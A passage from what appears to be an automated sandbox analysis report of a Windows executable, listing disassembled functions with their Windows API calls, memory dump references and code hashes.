Part of subcall function 00603187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00609F26
Part of subcall function 00603187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00609F39
Part of subcall function 00603187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00609F4C
Part of subcall function 00603187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00609F5F
Part of subcall function 00603187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00609F72
Part of subcall function 00603187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00609F85
Part of subcall function 00603187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00609F98
Part of subcall function 00603187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00609FAB
Part of subcall function 00603187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00609FBE

__mtinitlocks.LIBCMT ref: 00609AEB
__mtterm.LIBCMT ref: 00609AF4

Part of subcall function 00609B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00609AF9,00607CD0,0069A0B8,00000014), ref: 00609C56
Part of subcall function 00609B5C: _free.LIBCMT ref: 00609C5D
Part of subcall function 00609B5C: DeleteCriticalSection.KERNEL32(02j,?,?,00609AF9,00607CD0,0069A0B8,00000014), ref: 00609C7F

__calloc_crt.LIBCMT ref: 00609B19
__initptd.LIBCMT ref: 00609B3B
GetCurrentThreadId.KERNEL32 ref: 00609B42

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
String ID:
API String ID: 3567560977-0
Opcode ID: 7293ead1152d2d3fa3cedcb90813aae0c3644812a56facdc9fe59a12d061b4bf
Instruction ID: b97faaaad52dcea4486525d700b25f086b180bbe0c91518efd32346fb77fb247
Opcode Fuzzy Hash: 7293ead1152d2d3fa3cedcb90813aae0c3644812a56facdc9fe59a12d061b4bf
Instruction Fuzzy Hash: 21F0C2322C971159EBACBB74BC0368B36979F02334B204A1EF0A4852D3EF5084400178

Function 0066B635 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0066B644
_memset.LIBCMT ref: 0066B653
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,006A6F20,006A6F64), ref: 0066B682
CloseHandle.KERNEL32 ref: 0066B694

Strings

oj, xrefs: 0066B63E
doj, xrefs: 0066B64D

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID: oj$doj
API String ID: 3277943733-1467846714
Opcode ID: 6e36e1ef4021142b9f82a721286b4d7f95e88439c7d448d802b59f031a65d2eb
Instruction ID: 17266c62d351d4f99e4b53b55970b03fe443523409e0fff12bbc8c5efad4bce6
Opcode Fuzzy Hash: 6e36e1ef4021142b9f82a721286b4d7f95e88439c7d448d802b59f031a65d2eb
Instruction Fuzzy Hash: CFF05EB2540340BEE7103B61FC0AFBB7A9FEB0A395F045020FA08E51D2E7B15C008BA8

Function 0060406B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00603F85), ref: 00604085
GetProcAddress.KERNEL32(00000000), ref: 0060408C
EncodePointer.KERNEL32(00000000), ref: 00604097
DecodePointer.KERNEL32(00603F85), ref: 006040B2

Strings

RoUninitialize, xrefs: 00604074
combase.dll, xrefs: 00604080

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 3489934621-2819208100
Opcode ID: 3137ea0daedacc3a616c0db9de983c9c8c0ab5b4d0cadd719b7a42064a705052
Instruction ID: bf14583ea6a3e9426a1207011a9b2f6a0383891c30a4a9fc20fc10903a2d7491
Opcode Fuzzy Hash: 3137ea0daedacc3a616c0db9de983c9c8c0ab5b4d0cadd719b7a42064a705052
Instruction Fuzzy Hash: 38E0BF70681311DFEB20AF61FC1DB567AA7BB06742F206024F111F16A0CFB65A04CE54

Function 006464B8 Relevance: 9.2, APIs: 6, Instructions: 205COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0064660B
_memmove.LIBCMT ref: 00646546

Part of subcall function 005E9837: __itow.LIBCMT ref: 005E9862
Part of subcall function 005E9837: __swprintf.LIBCMT ref: 005E98AC

_memmove.LIBCMT ref: 006465B9
_memmove.LIBCMT ref: 006466A0
_memmove.LIBCMT ref: 006466B9
_memmove.LIBCMT ref: 006466D5

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: _memmove$__itow__swprintf
String ID:
API String ID: 3253778849-0
Opcode ID: c501d2cfef9f23abf16beb4b3eec8b141f75e8ad3671055b0f970422b07e1cb8
Instruction ID: ec7191d6d9468d2418eb43a2ba0b402647da735dc96da86f7f0902370c777ba2
Opcode Fuzzy Hash: c501d2cfef9f23abf16beb4b3eec8b141f75e8ad3671055b0f970422b07e1cb8
Instruction Fuzzy Hash: 9B61AE3050029AABDF09EF60CC85EFE3BA6BF45308F054529F9956B292DB34DC06CB56

Function 006601E4 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 005E7DE1: _memmove.LIBCMT ref: 005E7E22

Part of subcall function 00660E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0065FDAD,?,?), ref: 00660E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 006602BD
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 006602FD
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00660320
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00660349
RegCloseKey.ADVAPI32(?,?,00000000), ref: 0066038C
RegCloseKey.ADVAPI32(00000000), ref: 00660399

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
String ID:
API String ID: 4046560759-0
Opcode ID: d6d2af111bb4bb9297a4cd24d6709fb924bdc54258e5756b76a5e2e4ea56fde5
Instruction ID: a22b865f3c826f97bec8364b3b5113030777f519ff92abf34b93af135a03bc73
Opcode Fuzzy Hash: d6d2af111bb4bb9297a4cd24d6709fb924bdc54258e5756b76a5e2e4ea56fde5
Instruction Fuzzy Hash: 70516B31108245AFD704EF64C899EAFBBEAFF84314F04492DF5859B2A2DB71E905CB52

Function 00665799 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 006657FB
GetMenuItemCount.USER32(00000000), ref: 00665832
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0066585A
GetMenuItemID.USER32(?,?), ref: 006658C9
GetSubMenu.USER32(?,?), ref: 006658D7
PostMessageW.USER32(?,00000111,?,00000000), ref: 00665928

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: 9bbce59d8cef207fcefd72fdf61eb5c794f607f7a227472d017cb6c399e57728
Instruction ID: ea93ee447b519b7c2d02dee9badd4ab32d8952e9e4f016cbd6cbfb25bf9ffd37
Opcode Fuzzy Hash: 9bbce59d8cef207fcefd72fdf61eb5c794f607f7a227472d017cb6c399e57728
Instruction Fuzzy Hash: 76514F75E00625EFDF15DF64C846AAEBBB6EF48310F104069E852BB351CB74AE418B94

Function 0063EEEC Relevance: 9.2, APIs: 6, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0063EF06
VariantClear.OLEAUT32(00000013), ref: 0063EF78
VariantClear.OLEAUT32(00000000), ref: 0063EFD3
_memmove.LIBCMT ref: 0063EFFD
VariantClear.OLEAUT32(?), ref: 0063F04A
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0063F078

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType_memmove
String ID:
API String ID: 1101466143-0
Opcode ID: dbddcd379b3316f38b26f88bbeca2d0481353b1b4d8ed9528e37c75976b82d80
Instruction ID: 63413fad1dc7bb2ee8d62d4c8bf6c03d898dd08574f3ec4b4d16a68f61c3b787
Opcode Fuzzy Hash: dbddcd379b3316f38b26f88bbeca2d0481353b1b4d8ed9528e37c75976b82d80
Instruction Fuzzy Hash: C25154B5A00209AFCB14CF58C890AAAB7F9FF48310F15856AE949DB301E735E911CFA0

Function 0064220A Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00642258
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 006422A3
IsMenu.USER32(00000000), ref: 006422C3
CreatePopupMenu.USER32 ref: 006422F7
GetMenuItemCount.USER32(000000FF), ref: 00642355
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00642386

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: e36fdbdeb869d3032c7ad80825fcece2bc85643e26c9bc71ad82a90f36a92101
Instruction ID: deff8eed446bf27d526c77d65b7425b4e1d4fd07657bbab7c62c1d119874f2a3
Opcode Fuzzy Hash: e36fdbdeb869d3032c7ad80825fcece2bc85643e26c9bc71ad82a90f36a92101
Instruction Fuzzy Hash: A851AE7060020BDBDF22DF68D8A8BEEBBF6BF45314F648129F811A7290D7B49945CB51

Function 005E1765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 005E2612: GetWindowLongW.USER32(?,000000EB), ref: 005E2623

BeginPaint.USER32(?,?,?,?,?,?), ref: 005E179A
GetWindowRect.USER32(?,?), ref: 005E17FE
ScreenToClient.USER32(?,?), ref: 005E181B
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 005E182C
EndPaint.USER32(?,?), ref: 005E1876

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectScreenViewport
String ID:
API String ID: 1827037458-0
Opcode ID: 0e2585c131021702dbf61cef6b04a2e02652ac7c30b3f00e4d13d8da4760695f
Instruction ID: 345afcab288cdae2b37045b3973f75b72641be06a816f607de585116b59bbe68
Opcode Fuzzy Hash: 0e2585c131021702dbf61cef6b04a2e02652ac7c30b3f00e4d13d8da4760695f
Instruction Fuzzy Hash: 5941CF30104741AFC710EF26DC84FBA7BEAFB4A720F044629F9A58B2A1C770AC45DB61

Function 0066B69E Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(006A57B0,00000000,00F556E8,?,?,006A57B0,?,0066B5A8,?,?), ref: 0066B712
EnableWindow.USER32(00000000,00000000), ref: 0066B736
ShowWindow.USER32(006A57B0,00000000,00F556E8,?,?,006A57B0,?,0066B5A8,?,?), ref: 0066B796
ShowWindow.USER32(00000000,00000004,?,0066B5A8,?,?), ref: 0066B7A8
EnableWindow.USER32(00000000,00000001), ref: 0066B7CC
SendMessageW.USER32(?,0000130C,?,00000000), ref: 0066B7EF

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 5081583299fe0110790adc93beb2cf2614afee63952a4bdaac1fd4ad0eadb7c6
Instruction ID: 5e17d22f09c48d94fc483a280e4ce1a53f45e0344544ac3a54ea6939c6699381
Opcode Fuzzy Hash: 5081583299fe0110790adc93beb2cf2614afee63952a4bdaac1fd4ad0eadb7c6
Instruction Fuzzy Hash: 9B415834600254EFDB22CF28D499BD47FE2FB45311F1891B9E948CF6A2C771A896CB50

Function 0065709E Relevance: 9.1, APIs: 6, Instructions: 97COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,00654E41,?,?,00000000,00000001), ref: 006570AC

Part of subcall function 006539A0: GetWindowRect.USER32(?,?), ref: 006539B3

GetDesktopWindow.USER32 ref: 006570D6
GetWindowRect.USER32(00000000), ref: 006570DD
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 0065710F

Part of subcall function 00645244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 006452BC

GetCursorPos.USER32(?), ref: 0065713B
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00657199

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: 5252ec3323488e0ce7a410e6b16cd1e6c39878491518c06aff428b88c86bbfdc
Instruction ID: 62551b624248436ea5b53ebc79d180715d966f09c1978e3e74c1da501ce5eb62
Opcode Fuzzy Hash: 5252ec3323488e0ce7a410e6b16cd1e6c39878491518c06aff428b88c86bbfdc
Instruction Fuzzy Hash: 3A31D272509705ABD720DF14EC49B9BB7AAFF89314F040919F98597291CB70EA09CB92

Function 00638879 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 006380A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 006380C0
Part of subcall function 006380A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 006380CA
Part of subcall function 006380A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 006380D9
Part of subcall function 006380A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 006380E0
Part of subcall function 006380A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 006380F6

GetLengthSid.ADVAPI32(?,00000000,0063842F), ref: 006388CA
GetProcessHeap.KERNEL32(00000008,00000000), ref: 006388D6
HeapAlloc.KERNEL32(00000000), ref: 006388DD
CopySid.ADVAPI32(00000000,00000000,?), ref: 006388F6
GetProcessHeap.KERNEL32(00000000,00000000,0063842F), ref: 0063890A
HeapFree.KERNEL32(00000000), ref: 00638911

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: 129d9fcaa904390efe793e9d5164aae922a23bf2fb1d2a2cab0067d3e6bdc2af
Instruction ID: 33eba48f53acb3a5ecd03937c28341260b3bba65dc0dab2a390c5dce5eff8bab
Opcode Fuzzy Hash: 129d9fcaa904390efe793e9d5164aae922a23bf2fb1d2a2cab0067d3e6bdc2af
Instruction Fuzzy Hash: 3011AF71501209FFDB109FA8DC09BFEB76AFB45355F104028F88597250CB72A904DBA0

Function 006385B1 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 006385E2
OpenProcessToken.ADVAPI32(00000000), ref: 006385E9
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 006385F8
CloseHandle.KERNEL32(00000004), ref: 00638603
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00638632
DestroyEnvironmentBlock.USERENV(00000000), ref: 00638646

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: e65c6e74b9259394d59f1f3134cf98921af6df92ecde11d5391f66eebdaed7dd
Instruction ID: 9180cd6ebc4d005da67f05170bb0a543bba6d478f1acdcdcd200569ba8c50ad1
Opcode Fuzzy Hash: e65c6e74b9259394d59f1f3134cf98921af6df92ecde11d5391f66eebdaed7dd
Instruction Fuzzy Hash: D6116D7250020DAFDF018FA4ED49FDE7BAAEF48314F045064FE04A2161C7B18D65DBA0

Function 0063B790 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 0063B7B5
GetDeviceCaps.GDI32(00000000,00000058), ref: 0063B7C6
GetDeviceCaps.GDI32(00000000,0000005A), ref: 0063B7CD
ReleaseDC.USER32(00000000,00000000), ref: 0063B7D5
MulDiv.KERNEL32(000009EC,?,00000000), ref: 0063B7EC
MulDiv.KERNEL32(000009EC,?,?), ref: 0063B7FE

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 86d17b11a23496a477af3ce235369c2a5be4f1faa833a041390aed9e9e54c827
Instruction ID: 9665437e7c72366d3bc067b1da5410fbe53296515b2f6d93dfb755e4d1b9a75c
Opcode Fuzzy Hash: 86d17b11a23496a477af3ce235369c2a5be4f1faa833a041390aed9e9e54c827
Instruction Fuzzy Hash: C60184B5E00209BBEB109BA6DC45A5EBFB9EB48351F004075FA04E7391D6719C10CF90

Function 00600162 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00600193
MapVirtualKeyW.USER32(00000010,00000000), ref: 0060019B
MapVirtualKeyW.USER32(000000A0,00000000), ref: 006001A6
MapVirtualKeyW.USER32(000000A1,00000000), ref: 006001B1
MapVirtualKeyW.USER32(00000011,00000000), ref: 006001B9
MapVirtualKeyW.USER32(00000012,00000000), ref: 006001C1

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 0b0d99490c7ce82c2e514eb6db2fc30c38e66f73171b9ab06e8ef5dcbc5d4417
Instruction ID: ab469080b3293e9461cd8d5df578e56dc5db26a65a8109de4672565b06bb25d0
Opcode Fuzzy Hash: 0b0d99490c7ce82c2e514eb6db2fc30c38e66f73171b9ab06e8ef5dcbc5d4417
Instruction Fuzzy Hash: 3D016CB09017597DE3008F5A8C85B52FFA8FF19354F00411BE15C87941C7F5A864CBE5

Function 006453E9 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 006453F9
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0064540F
GetWindowThreadProcessId.USER32(?,?), ref: 0064541E
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0064542D
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00645437
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0064543E

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

